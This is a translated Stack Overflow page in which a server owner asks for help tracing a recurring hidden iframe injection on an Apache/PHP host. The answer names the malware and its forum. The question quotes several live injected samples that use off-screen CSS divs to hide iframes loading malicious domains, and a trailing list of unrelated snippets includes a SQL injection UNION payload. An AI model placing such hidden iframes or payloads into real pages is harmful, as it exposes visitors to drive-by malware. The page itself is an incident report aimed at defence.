个人中心
文章发布
退出
作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
26
4
几个月前,一个隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点关闭进行维护时,iFrame 仍然在关闭维护页面上。最终,宿主封锁了 iFrame 的来源,但我们始终没有找到后门。注入(inject)的 iFrame 看起来像这样,但包裹在样式标签中以进行混淆并带有各种 URL:
iframe src="http://heusnsy.nl/32283947.html..
我们将较小的站点移到了不同的主机上,它们都很好。
我们将主站点移至同一主机上的新专用服务器,尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 返回。
我们到处寻找它是如何进入的——配置文件、htaccess——但找不到它。
知道隐藏的 iFrame 注入(inject)漏洞在哪里吗?
编辑:以下是更多详细信息:运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入(inject)的代码如下所示:
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新:以下是更多信息和我们学到的知识:
主机:Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64/Apache 版本 2.2.15 - PHP 5.3.3 (cli)(构建时间:2012 年 7 月 3 日 16:53:21)
服务器本身没有受到损害。
包括 (apache/php) 在内的所有服务都已升级到我们系统可用的最新版本。
没有帐户(ftp 或其他方式)受到损害。
恶意软件会同时更改多个受感染网站的目标 URL (iframe src=)。 (由 unmaskparasites.com 提供)
在更改 src 目标期间,没有执行/运行流氓或隐藏进程。
TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码,但在接收恶意软件的用户的 GET 请求中没有发现任何异常 - 在相应的 apache 访问日志中也没有发现异常。
在 iFrame 的 src url 地址切换期间,网站文件或 httpd/php 二进制文件未以任何方式更改 - 由 md5sum 检查提供。
在更改期间,未在已知服务的已知端口上建立恶意连接。防火墙负责其余的工作。
rkhunter 和 maldet 没有得出任何结果。
恶意软件 iFrame 在第一个 "</script>" 之后立即被触发和注入(inject)在此服务器上的所有帐户和网站上,任何具有此标签的页面上的标签。
恶意软件被注入(inject)到静态页面和没有数据库连接的网站上。 (页面有<head> </script></head>标签就够了)
没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块已暂停并被注释掉。
恶意软件不会一直存在。它来来去去,有时会关闭几个小时,然后为多个用户出现并再次熄灭。使其极难追踪。
我们网站上运行的 100% 的 php 代码和大部分 javascript 代码(phpmyadmin 代码除外)都是自定义编码的。唯一没有的是 Jquery 库。
服务器是高流量机器,在日志中搜索/匹配非常慢。每周访问日志可以超过 15GB。
情况就是这样……这不再是帐户被盗、文件被黑、恶意脚本的问题。这超出了我们目前所见,原因隐藏在 apache/php 本身的某处。 (至少这是我们的想法)。非常感谢任何帮助或想法。
以下是 iFrame 注入(inject)的示例:
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>
最佳答案
检查一下...劫持您的服务器的程序的恶作剧作者被称为“Left4Dead”——他的 iframe 注入(inject) doo-hicky 被称为“BlackLeech”。您可以在 Damagelab .org(CRIMINAL FORUM!!)上找到这位先生和他的广告。
每次 root 登录时,恶意软件都会停止所有事件,或者如果您通过 SSH 连接到您的服务器。它还监控系统监控工具:|
notice how your thread is listed as a reference :))
if you need help with translation, hit me up!
关于security - iFrame 注入(inject)攻击跟踪我们到新服务器,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11955634/
26
4
0
我正在尝试测试依赖于其他服务 authService 的服务 documentViewer angular .module('someModule') .service('docu
如果我的网站上线(不要认为它会,目前它只是一个学习练习)。 我一直在使用 mysql_real_escape_string();来自 POST、SERVER 和 GET 的数据。另外,我一直在使用 i
我有以下代码,它容易受到 SQL 注入(inject)的攻击(我认为?): $IDquery = mysqli_query($connection, "SELECT `ID` FROM users W
我一直在自学如何创建扩展,以期将它们用于 CSS 注入(inject)(以及最终以 CSS 为载体的 SVG 注入(inject),但那是以后的问题)。 这是我当前的代码: list .json {
这个简单的代码应该通过 Java Spring 实现一个简单的工厂。然而结果是空指针,因为 Human 对象没有被注入(inject)对象(所以它保持空)。 我做错了什么? 谢谢 配置 @Config
我正在编写一个 ASP.NET MVC4 应用程序,它最终会动态构建一个 SQL SELECT 语句,以便稍后存储和执行。动态 SQL 的结构由用户配置以用户友好的方式确定,具有标准复选框、下拉列表和
首先让我说我是我为确保 SQL 注入(inject)攻击失败而采取的措施的知己。所有 SQL 查询值都是通过事件记录准备语句完成的,所有运算符(如果不是硬编码)都是通过数字白名单系统完成的。这意味着如
这是 SQL 映射声称可注入(inject)的负载: user=-5305' UNION ALL SELECT NULL,CONCAT(0x716b6b7071,0x4f5577454f76734
我正在使用 Kotlin 和 Android 架构组件(ViewModel、LiveData)构建一个新的 Android 应用程序的架构,并且我还使用 Koin 作为我的依赖注入(inject)提供
假设 RequestScope 处于 Activity 状态(使用 cdi-unit 的 @InRequestScope) 给定 package at.joma.stackoverflow.cdi;
我有一个搜索表单,可以在不同的提供商中搜索。 我从拥有一个基本 Controller 开始 public SearchController : Controller { protected r
SQLite 注入 如果您的站点允许用户通过网页输入,并将输入内容插入到 SQLite 数据库中,这个时候您就面临着一个被称为 SQL 注入的安全问题。本章节将向您讲解如何防止这种情况的发生,确保脚
我可以从什么 dll 中获得 Intercept 的扩展?我从 http://github.com/danielmarbach/ninject.extensions.interception 添加了
使用 NInject 解析具有多个构造函数的类似乎不起作用。 public class Class1 : IClass { public Class1(int param) {...} public
我有一个 MetaManager 类: @Injectable() export class MetaManager{ constructor(private handlers:Handler
我是 Angular 的新手,我不太清楚依赖注入(inject)是如何工作的。我的问题是我有依赖于服务 B 的服务 A,但是当我将服务 A 注入(inject)我的测试服务 B 时,服务 B 变得未定
我正在为我的项目使用 android 应用程序启动、刀柄和空间。我在尝试排队工作时遇到错误: com.test E/WM-WorkerFactory: Could not instantiate co
我不确定这是什么糖语法,但让我向您展示问题所在。 def factors num (1..num).select {|n| num % n == 0} end def mutual_factors
简单的问题,我已经看过这个了:Managing imports in Scalaz7 ,但我不知道如何最小化注入(inject) right和 left方法到我的对象中以构造 \/ 的实例. 我确实尝
在我的 Aurelia SPA 中,我有一些我想在不同模块中使用的功能。它依赖于调用时给出的参数和单例的参数。有没有办法创建一个导出函数,我可以将我的 Auth 单例注入(inject)其中,而不必在
我是一名优秀的程序员,十分优秀!